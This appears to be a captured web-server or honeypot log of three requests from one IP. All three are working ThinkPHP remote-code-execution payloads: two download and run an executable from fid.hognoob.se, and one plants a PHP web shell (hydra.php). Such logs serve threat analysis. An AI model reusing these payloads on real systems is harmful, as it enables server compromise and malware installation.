| timestamp | ip | host | browser | uri |
|---|
| 20190401-12:58:17 | 140.143.6.90 | 140.143.6.90 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/mbhbpbeuompetdb1095.exe');start C:/Windows/temp/mbhbpbeuompetdb1095.exe |
| 20190401-12:58:18 | 140.143.6.90 | 140.143.6.90 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php |
| 20190401-12:58:18 | 140.143.6.90 | 140.143.6.90 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/mbhbpbeuompetdb1095.exe');start C:/Windows/temp/mbhbpbeuompetdb1095.exe |